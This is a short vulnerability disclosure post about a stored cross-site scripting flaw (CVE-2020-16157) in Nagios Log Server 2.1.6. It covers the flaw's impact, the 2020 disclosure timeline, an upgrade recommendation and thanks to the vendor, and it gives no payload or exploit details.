Stored XSS Vulnerability found in Nagios Log Server

Stored XSS Vulnerability found in Nagios Log Server

On testing the popular log monitoring and management application, Nagios Log Server version 2.1.6 (latest at the time of testing), I found that it is vulnerable to Stored XSS attacks.

CVE-2020-16157

Summary

Nagios Log Server is a popular Centralized Log Management, Monitoring, and Analysis software that allows organizations to view, sort, and configure logs. Version 2.1.6 of the application was found to be vulnerable to Stored XSS.

Stored Cross Site Scripting attacks involves an attacker injecting a script (referred to as the payload) that is permanently stored (persisted) on the target application (for instance within a database). A classic example is a malicious script inserted by an attacker in a comment field on a blog or in a forum post.

Impact

An attacker (in this case, an authenticated regular user) can use this high severity vulnerability to execute malicious JavaScript aimed to steal cookies, redirect users, perform arbitrary actions on the victim’s (in this case, an admin’s) behalf, logging their keystroke and more.

The attacker does not need to find an external way of inducing other users to make a particular request containing their exploit. Rather, the attacker places their exploit into the application itself and simply waits for the victim to encounter it.

Vulnerability

More details on the vulnerability will be added on August 15, 2020, giving users the time to update to the latest version.

Timeline

  • Vulnerability reported to the Nagios team – July 08, 2020
  • Nagios Log Server 2.1.7 containing the fix to the vulnerability released – July 28, 2020

Recommendation

It is highly recommended to update the application to the latest version.

Reference

Special Note

Highly appreciate the Nagios team for their quick back-and-forth communication regarding the vulnerability report and the timely update fixing the issue.

Written by
Jinson Varghese
Join the discussion